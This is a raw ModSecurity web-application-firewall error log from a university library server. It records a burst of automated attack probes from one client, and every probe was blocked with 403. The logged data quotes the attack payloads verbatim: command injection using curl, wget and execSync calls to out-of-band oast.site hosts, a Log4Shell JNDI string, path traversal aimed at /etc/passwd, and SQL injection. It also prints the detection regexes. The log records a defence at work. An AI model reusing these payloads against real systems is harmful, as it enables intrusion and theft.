[Tue Aug 29 11:33:12.624391 2023] [:error] [pid 1105] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmn8l5jmimk2adbbnlghp1fypiqkdt3s.oast.site found within TX:1: cjmn8l5jmimk2adbbnlghp1fypiqkdt3s.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO11CMCo-f0AAARR264AAAAF"]
[Tue Aug 29 11:33:12.763076 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:hostname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: `id found within ARGS:hostname: `id`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/controller/ping.php"] [unique_id "ZO11CMCo-f0AAANsAcoAAAAD"]
[Tue Aug 29 11:33:12.764497 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmn8l5jmimk2adbbnlgr6t9k4sgdjgea.oast.site found within TX:1: cjmn8l5jmimk2adbbnlgr6t9k4sgdjgea.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO11CMCo-f0AAARQ36wAAAAB"]
[Tue Aug 29 11:33:13.304611 2023] [:error] [pid 1105] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmn8l5jmimk2adbbnlgq1uwuqe8ismzj.oast.site found within TX:1: cjmn8l5jmimk2adbbnlgq1uwuqe8ismzj.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO11CcCo-f0AAARR27QAAAAF"]
[Tue Aug 29 11:33:13.344031 2023] [:error] [pid 1112] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmn8l5jmimk2adbbnlgscj5ygappgd36.oast.site found within TX:1: cjmn8l5jmimk2adbbnlgscj5ygappgd36.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO11CcCo-f0AAARYxDQAAAAJ"]
[Tue Aug 29 11:33:14.407564 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:stagingTaskData. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /\\x22>\\x0a  < found within ARGS:stagingTaskData: <SOAP-ENV:Envelope xmlns:xsi=\\x22http://www.w3.org/2001/XMLSchema-instance\\x22 xmlns:xsd=\\x22http://www.w3.org/2001/XMLSchema\\x22 xmlns:SOAP-ENC=\\x22http://schemas.xmlsoap.org/soap/encoding/\\x22 xmlns:SOAP-ENV=\\x22http://schemas.xmlsoap.org/soap/envelope/\\x22 xmlns:clr=\\x22http://schemas.microsoft.com/soap/encoding/clr/1.0\\x22 SOAP-ENV:encodingStyle=\\x22http://schemas.xmlsoap.org/soap/encoding/\\x22>\\x0a  <SOAP-ENV:Body>\\x0a    <a1:WindowsIden..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData"] [unique_id "ZO11CsCo-f0AAARA7eoAAAAA"]
[Tue Aug 29 11:33:14.463568 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:inUrl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:inUrl: file///etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/wavemaker/studioService.download"] [unique_id "ZO11CsCo-f0AAARA7esAAAAA"]
[Tue Aug 29 11:33:14.580783 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchField. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:searchField: antani' union select (select concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d) limit 0,1),NULL,NULL,NULL,NULL -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/compliancepolicyelements.inc.php"] [unique_id "ZO11CsCo-f0AAANsAdUAAAAD"]
[Tue Aug 29 11:33:18.040218 2023] [:error] [pid 1105] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:jk. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:jk: pyimport os;os.system(\\x22curl cjmn8l5jmimk2adbbnlgpjq7yacqdxxh7.oast.site\\x22);f=function f2(){};"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/flash/addcrypted2"] [unique_id "ZO11DsCo-f0AAARR280AAAAF"]
[Tue Aug 29 11:33:18.715514 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:macAddress. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:macAddress: 112233445566;wget http:/cjmn8l5jmimk2adbbnlgk7qk1z1p99ye1.oast.site#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/boardDataWW.php"] [unique_id "ZO11DsCo-f0AAARdiHoAAAAK"]
[Tue Aug 29 11:33:18.987678 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:id: 12 AND (SELECT 5023 FROM (SELECT(SLEEP(6)))Fvrh)-- VoFu"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11DsCo-f0AAARpgw4AAAAU"]
[Tue Aug 29 11:33:19.035030 2023] [:error] [pid 1139] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:target. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: //..//..//..//..//..//../ found within ARGS:target: l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@/base64>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/elfinder/php/connector.minimal.php"] [unique_id "ZO11D8Co-f0AAARzXwMAAAAd"]
[Tue Aug 29 11:33:19.340338 2023] [:error] [pid 1139] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ip. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: >../../ found within ARGS:ip: 127.0.0.1|cat /etc/passwd>../../2UdxkKVwy9OqHqptk3OiMdsqI1X.txt"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/manager/radius/server_ping.php"] [unique_id "ZO11D8Co-f0AAARzXwgAAAAd"]
[Tue Aug 29 11:33:19.341609 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../..// found within ARGS:fname: ../../../../../../..//etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/logs/downloadMainLog"] [unique_id "ZO11D8Co-f0AAARpgxQAAAAU"]
[Tue Aug 29 11:33:20.370414 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../// found within ARGS:fname: ../../../../../../..///config/MPXnode/www/appConfig/userDB.json"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/logs/downloadMainLog"] [unique_id "ZO11EMCo-f0AAARdiIQAAAAK"]
[Tue Aug 29 11:33:21.327825 2023] [:error] [pid 1107] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:order. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:order: id;select(md5(999999999))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/api/experimental/patternfile"] [unique_id "ZO11EcCo-f0AAARTEN0AAAAG"]
[Tue Aug 29 11:33:22.301667 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:document. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:document: this.constructor.constructor(\\x22return process\\x22)().mainModule.require(\\x22child_process\\x22).execSync(\\x22curl cjmn8l5jmimk2adbbnlgnasroimfpxwds.oast.site\\x22)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/checkValid"] [unique_id "ZO11EsCo-f0AAARpgxwAAAAU"]
[Tue Aug 29 11:33:23.299525 2023] [:error] [pid 1139] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/forumrunner/request.php"] [unique_id "ZO11E8Co-f0AAARzXxQAAAAd"]
[Tue Aug 29 11:33:24.358993 2023] [:error] [pid 1135] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/boards/forumrunner/request.php"] [unique_id "ZO11FMCo-f0AAARv7QUAAAAY"]
[Tue Aug 29 11:33:24.376267 2023] [:error] [pid 1139] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:Cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: - found within ARGS:Cmd: ping${IFS}-c${IFS}1${IFS}cjmn8l5jmimk2adbbnlg1kmt3wu7sqcyb.oast.site"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "perpustakaan.unla.ac.id"] [uri "/cgi-bin/admin.cgi"] [unique_id "ZO11FMCo-f0AAARzXxwAAAAd"]
[Tue Aug 29 11:33:25.327806 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:ReaderNo. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ` found within ARGS:ReaderNo: `sleep 7`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/card_scan.php"] [unique_id "ZO11FcCo-f0AAARjjMAAAAAL"]
[Tue Aug 29 11:33:25.351908 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/board/forumrunner/request.php"] [unique_id "ZO11FcCo-f0AAANsAfAAAAAD"]
[Tue Aug 29 11:33:26.406329 2023] [:error] [pid 1128] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:uploaddir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: '; found within ARGS:uploaddir: ';whoami;'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/upgrade_handle.php"] [unique_id "ZO11FsCo-f0AAARo8yQAAAAT"]
[Tue Aug 29 11:33:26.448391 2023] [:error] [pid 1134] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/forum/forumrunner/request.php"] [unique_id "ZO11FsCo-f0AAARu2rsAAAAW"]
[Tue Aug 29 11:33:26.487273 2023] [:error] [pid 1135] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:userName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:userName: ${jndi:ldap://${:-584}${:-462}.${hostName}.username.cjmn8l5jmimk2adbbnlgpg66f3w4hw8zb.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/ui/login.action"] [unique_id "ZO11FsCo-f0AAARv7QwAAAAY"]
[Tue Aug 29 11:33:27.324301 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/forums/forumrunner/request.php"] [unique_id "ZO11F8Co-f0AAARjjMcAAAAL"]
[Tue Aug 29 11:33:27.348249 2023] [:error] [pid 1133] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me found within TX:1: oast.me"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp1/home-18/"] [unique_id "ZO11F8Co-f0AAARt-9IAAAAV"]
[Tue Aug 29 11:33:27.368561 2023] [:error] [pid 1139] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:rootUname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:rootUname:  cat/etc/passwd #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/install/lib/ajaxHandlers/ajaxServerSettingsChk.php"] [unique_id "ZO11F8Co-f0AAARzXyIAAAAd"]
[Tue Aug 29 11:33:28.312927 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/vb/forumrunner/request.php"] [unique_id "ZO11GMCo-f0AAANsAfsAAAAD"]
[Tue Aug 29 11:33:29.393070 2023] [:error] [pid 1099] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:logName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:logName: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/enginemanager/server/logs/download"] [unique_id "ZO11GcCo-f0AAARLXxQAAAAQ"]
[Tue Aug 29 11:33:31.525178 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "perpustakaan.unla.ac.id"] [uri "/sitecore/shell/ClientBin/Reporting/Report.ashx"] [unique_id "ZO11G8Co-f0AAAQKOmAAAAAs"]
